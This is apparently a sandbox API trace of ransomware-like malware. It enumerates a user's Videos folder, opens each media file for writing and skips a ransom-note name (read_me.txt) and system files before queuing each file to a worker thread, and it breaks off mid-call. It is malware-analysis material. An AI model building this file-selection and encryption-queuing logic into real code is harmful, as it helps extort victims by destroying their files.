GetProcessHeap () returned 0x4f10000 [0081.944] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.944] GetProcessHeap () returned 0x4f10000 [0081.944] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.944] GetProcessHeap () returned 0x4f10000 [0081.944] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.944] GetProcessHeap () returned 0x4f10000 [0081.944] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.944] GetProcessHeap () returned 0x4f10000 [0081.944] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.944] GetProcessHeap () returned 0x4f10000 [0081.944] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.944] GetProcessHeap () returned 0x4f10000 [0081.944] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.944] GetProcessHeap () returned 0x4f10000 [0081.944] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.944] GetProcessHeap () returned 0x4f10000 [0081.944] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.944] GetProcessHeap () returned 0x4f10000 [0081.944] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.944] GetProcessHeap () returned 0x4f10000 [0081.944] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.944] GetProcessHeap () returned 0x4f10000 [0081.944] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.944] GetProcessHeap () returned 0x4f10000 [0081.944] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.944] GetProcessHeap () returned 0x4f10000 [0081.944] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.944] GetProcessHeap () returned 0x4f10000 [0081.944] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.944] GetProcessHeap () returned 0x4f10000 [0081.944] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.944] GetProcessHeap () returned 0x4f10000 [0081.944] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.944] GetProcessHeap () returned 0x4f10000 [0081.944] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.944] GetProcessHeap () returned 0x4f10000 [0081.944] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.945] GetProcessHeap () returned 0x4f10000 [0081.945] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.945] GetProcessHeap () returned 0x4f10000 [0081.945] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.945] GetProcessHeap () returned 0x4f10000 [0081.945] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.945] GetProcessHeap () returned 0x4f10000 [0081.945] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.945] GetProcessHeap () returned 0x4f10000 [0081.945] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.945] GetProcessHeap () returned 0x4f10000 [0081.945] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.945] GetProcessHeap () returned 0x4f10000 [0081.945] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.945] GetProcessHeap () returned 0x4f10000 [0081.945] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0081.945] GetProcessHeap () returned 0x4f10000 [0081.945] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.945] GetProcessHeap () returned 0x4f10000 [0081.945] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0081.945] GetProcessHeap () returned 0x4f10000 [0081.945] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0081.945] GetProcessHeap () returned 0x4f10000 [0081.945] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0081.945] GetProcessHeap () returned 0x4f10000 [0081.945] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0081.945] GetProcessHeap () returned 0x4f10000 [0081.945] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0081.945] GetProcessHeap () returned 0x4f10000 [0081.945] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0081.945] GetProcessHeap () returned 0x4f10000 [0081.945] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.945] GetProcessHeap () returned 0x4f10000 [0081.945] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0081.945] GetProcessHeap () returned 0x4f10000 [0081.945] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.946] GetProcessHeap () returned 0x4f10000 [0081.946] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.946] GetProcessHeap () returned 0x4f10000 [0081.946] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.946] GetProcessHeap () returned 0x4f10000 [0081.946] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.946] GetProcessHeap () returned 0x4f10000 [0081.946] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.946] GetProcessHeap () returned 0x4f10000 [0081.946] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.946] GetProcessHeap () returned 0x4f10000 [0081.946] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.946] GetProcessHeap () returned 0x4f10000 [0081.946] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.946] GetProcessHeap () returned 0x4f10000 [0081.946] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.946] GetProcessHeap () returned 0x4f10000 [0081.946] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.946] GetProcessHeap () returned 0x4f10000 [0081.946] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.946] GetProcessHeap () returned 0x4f10000 [0081.946] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.946] GetProcessHeap () returned 0x4f10000 [0081.946] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.946] GetProcessHeap () returned 0x4f10000 [0081.946] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.946] GetProcessHeap () returned 0x4f10000 [0081.946] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.947] GetProcessHeap () returned 0x4f10000 [0081.947] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.947] GetProcessHeap () returned 0x4f10000 [0081.947] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.947] GetProcessHeap () returned 0x4f10000 [0081.947] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.947] GetProcessHeap () returned 0x4f10000 [0081.947] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.947] GetProcessHeap () returned 0x4f10000 [0081.947] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.947] GetProcessHeap () returned 0x4f10000 [0081.947] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.947] GetProcessHeap () returned 0x4f10000 [0081.947] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.947] GetProcessHeap () returned 0x4f10000 [0081.947] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.947] GetProcessHeap () returned 0x4f10000 [0081.947] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.947] GetProcessHeap () returned 0x4f10000 [0081.947] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0081.947] GetProcessHeap () returned 0x4f10000 [0081.947] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.947] GetProcessHeap () returned 0x4f10000 [0081.947] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0081.947] GetProcessHeap () returned 0x4f10000 [0081.947] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0081.947] GetProcessHeap () returned 0x4f10000 [0081.947] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0081.947] GetProcessHeap () returned 0x4f10000 [0081.947] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0081.947] SetFilePointerEx (in: hFile=0x8a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.948] WriteFile (in: hFile=0x8a4, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0081.948] WriteFile (in: hFile=0x8a4, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0081.948] GetProcessHeap () returned 0x4f10000 [0081.948] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0081.948] GetProcessHeap () returned 0x4f10000 [0081.948] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0081.948] GetProcessHeap () returned 0x4f10000 [0081.948] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0081.948] CloseHandle (hObject=0x8a4) returned 1 [0081.949] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 74 [0081.949] GetProcessHeap () returned 0x4f10000 [0081.949] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b20098 [0081.950] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn\\*") returned 48 [0081.950] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn\\*", lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd5f66dd0, ftCreationTime.dwHighDateTime=0x1d4cf4f, ftLastAccessTime.dwLowDateTime=0x24e15820, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24e15820, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName=".", cAlternateFileName="")) returned 0x7cfe768 [0081.950] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn\\.") returned 48 [0081.950] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd5f66dd0, ftCreationTime.dwHighDateTime=0x1d4cf4f, ftLastAccessTime.dwLowDateTime=0x24e15820, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24e15820, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="..", cAlternateFileName="")) returned 1 [0081.951] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn\\..") returned 49 [0081.951] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9ac94380, ftCreationTime.dwHighDateTime=0x1d4ce6f, ftLastAccessTime.dwLowDateTime=0x24dc9560, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24dc9560, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="1XLsojndpt9tv", cAlternateFileName="1XLSOJ~1")) returned 1 [0081.951] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn\\1XLsojndpt9tv") returned 60 [0081.951] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7fcf7cd0, ftCreationTime.dwHighDateTime=0x1d4d120, ftLastAccessTime.dwLowDateTime=0x53bbcd90, ftLastAccessTime.dwHighDateTime=0x1d4c768, ftLastWriteTime.dwLowDateTime=0x53bbcd90, ftLastWriteTime.dwHighDateTime=0x1d4c768, nFileSizeHigh=0x0, nFileSizeLow=0xf8e4, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="F6PZ6U_byBE9.mkv", cAlternateFileName="F6PZ6U~1.MKV")) returned 1 [0081.951] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn\\F6PZ6U_byBE9.mkv") returned 63 [0081.951] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn\\F6PZ6U_byBE9.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\sn6fn\\f6pz6u_bybe9.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8a0 [0081.951] StrStrW (lpFirst="f6pz6u_bybe9.mkv", lpSrch="read_me.txt") returned 0x0 [0081.951] StrStrW (lpFirst="f6pz6u_bybe9.mkv", lpSrch="autoexec.bat") returned 0x0 [0081.951] StrStrW (lpFirst="f6pz6u_bybe9.mkv", lpSrch="desktop.ini") returned 0x0 [0081.951] StrStrW (lpFirst="f6pz6u_bybe9.mkv", lpSrch="autorun.inf") returned 0x0 [0081.951] StrStrW (lpFirst="f6pz6u_bybe9.mkv", lpSrch="ntuser.dat") returned 0x0 [0081.951] StrStrW (lpFirst="f6pz6u_bybe9.mkv", lpSrch="iconcache.db") returned 0x0 [0081.959] StrStrW (lpFirst="f6pz6u_bybe9.mkv", lpSrch="bootsect.bak") returned 0x0 [0081.959] StrStrW (lpFirst="f6pz6u_bybe9.mkv", lpSrch="boot.ini") returned 0x0 [0081.959] StrStrW (lpFirst="f6pz6u_bybe9.mkv", lpSrch="ntuser.dat.log") returned 0x0 [0081.959] StrStrW (lpFirst="f6pz6u_bybe9.mkv", lpSrch="thumbs.db") returned 0x0 [0081.959] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 195 [0081.959] QueueUserWorkItem (Function=0x404e00, Context=0x8a0, Flags=0x0) returned 1 [0081.959] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24e15820, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24e15820, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24e15820, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0081.959] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn\\read_me.txt") returned 58 [0081.959] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\sn6fn\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x89c [0081.959] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0081.959] CloseHandle (hObject=0x89c) returned 1 [0081.959] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24e15820, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24e15820, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24e15820, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0081.959] FindClose (in: hFindFile=0x7cfe768 | out: hFindFile=0x7cfe768) returned 1 [0081.959] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn\\read_me.txt") returned 58 [0081.959] GetProcessHeap () returned 0x4f10000 [0081.959] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b20098 | out: hHeap=0x4f10000) returned 1 [0081.960] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 90 [0081.960] GetProcessHeap () returned 0x4f10000 [0081.960] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b800c8 | out: hHeap=0x4f10000) returned 1 [0081.960] GetProcessHeap () returned 0x4f10000 [0081.960] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b20098 [0081.960] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn\\1XLsojndpt9tv\\*") returned 62 [0081.960] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn\\1XLsojndpt9tv\\*", lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9ac94380, ftCreationTime.dwHighDateTime=0x1d4ce6f, ftLastAccessTime.dwLowDateTime=0x24dc9560, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24dc9560, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName=".", cAlternateFileName="")) returned 0x7cfe768 [0081.960] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn\\1XLsojndpt9tv\\.") returned 62 [0081.960] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9ac94380, ftCreationTime.dwHighDateTime=0x1d4ce6f, ftLastAccessTime.dwLowDateTime=0x24dc9560, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24dc9560, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="..", cAlternateFileName="")) returned 1 [0081.960] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn\\1XLsojndpt9tv\\..") returned 63 [0081.960] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb084170, ftCreationTime.dwHighDateTime=0x1d4c915, ftLastAccessTime.dwLowDateTime=0x8dd906b0, ftLastAccessTime.dwHighDateTime=0x1d4d018, ftLastWriteTime.dwLowDateTime=0x8dd906b0, ftLastWriteTime.dwHighDateTime=0x1d4d018, nFileSizeHigh=0x0, nFileSizeLow=0x13386, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="Bx5kxDo8JklXYWeXrJN.mp4", cAlternateFileName="BX5KXD~1.MP4")) returned 1 [0081.960] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn\\1XLsojndpt9tv\\Bx5kxDo8JklXYWeXrJN.mp4") returned 84 [0081.960] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn\\1XLsojndpt9tv\\Bx5kxDo8JklXYWeXrJN.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\sn6fn\\1xlsojndpt9tv\\bx5kxdo8jklxywexrjn.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x89c [0081.960] StrStrW (lpFirst="bx5kxdo8jklxywexrjn.mp4", lpSrch="read_me.txt") returned 0x0 [0081.960] StrStrW (lpFirst="bx5kxdo8jklxywexrjn.mp4", lpSrch="autoexec.bat") returned 0x0 [0081.960] StrStrW (lpFirst="bx5kxdo8jklxywexrjn.mp4", lpSrch="desktop.ini") returned 0x0 [0081.960] StrStrW (lpFirst="bx5kxdo8jklxywexrjn.mp4", lpSrch="autorun.inf") returned 0x0 [0081.960] StrStrW (lpFirst="bx5kxdo8jklxywexrjn.mp4", lpSrch="ntuser.dat") returned 0x0 [0081.960] StrStrW (lpFirst="bx5kxdo8jklxywexrjn.mp4", lpSrch="iconcache.db") returned 0x0 [0081.961] StrStrW (lpFirst="bx5kxdo8jklxywexrjn.mp4", lpSrch="bootsect.bak") returned 0x0 [0081.961] StrStrW (lpFirst="bx5kxdo8jklxywexrjn.mp4", lpSrch="boot.ini") returned 0x0 [0081.961] StrStrW (lpFirst="bx5kxdo8jklxywexrjn.mp4", lpSrch="ntuser.dat.log") returned 0x0 [0081.961] StrStrW (lpFirst="bx5kxdo8jklxywexrjn.mp4", lpSrch="thumbs.db") returned 0x0 [0081.961] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 196 [0081.961] QueueUserWorkItem (Function=0x404e00, Context=0x89c, Flags=0x0) returned 1 [0081.961] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3bb1300, ftCreationTime.dwHighDateTime=0x1d4cd49, ftLastAccessTime.dwLowDateTime=0x8bb4e470, ftLastAccessTime.dwHighDateTime=0x1d4cfe7, ftLastWriteTime.dwLowDateTime=0x8bb4e470, ftLastWriteTime.dwHighDateTime=0x1d4cfe7, nFileSizeHigh=0x0, nFileSizeLow=0x16e8, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="KjzG1Txqb_0l.avi", cAlternateFileName="KJZG1T~1.AVI")) returned 1 [0081.961] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn\\1XLsojndpt9tv\\KjzG1Txqb_0l.avi") returned 77 [0081.961] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn\\1XLsojndpt9tv\\KjzG1Txqb_0l.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\sn6fn\\1xlsojndpt9tv\\kjzg1txqb_0l.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x898 [0081.961] StrStrW (lpFirst="kjzg1txqb_0l.avi", lpSrch="read_me.txt") returned 0x0 [0081.961] StrStrW (lpFirst="kjzg1txqb_0l.avi", lpSrch="autoexec.bat") returned 0x0 [0081.961] StrStrW (lpFirst="kjzg1txqb_0l.avi", lpSrch="desktop.ini") returned 0x0 [0081.961] StrStrW (lpFirst="kjzg1txqb_0l.avi", lpSrch="autorun.inf") returned 0x0 [0081.961] StrStrW (lpFirst="kjzg1txqb_0l.avi", lpSrch="ntuser.dat") returned 0x0 [0081.961] StrStrW (lpFirst="kjzg1txqb_0l.avi", lpSrch="iconcache.db") returned 0x0 [0081.961] StrStrW (lpFirst="kjzg1txqb_0l.avi", lpSrch="bootsect.bak") returned 0x0 [0081.961] StrStrW (lpFirst="kjzg1txqb_0l.avi", lpSrch="boot.ini") returned 0x0 [0081.961] StrStrW (lpFirst="kjzg1txqb_0l.avi", lpSrch="ntuser.dat.log") returned 0x0 [0081.962] StrStrW (lpFirst="kjzg1txqb_0l.avi", lpSrch="thumbs.db") returned 0x0 [0081.962] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 197 [0081.962] QueueUserWorkItem (Function=0x404e00, Context=0x898, Flags=0x0) returned 1 [0081.962] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | 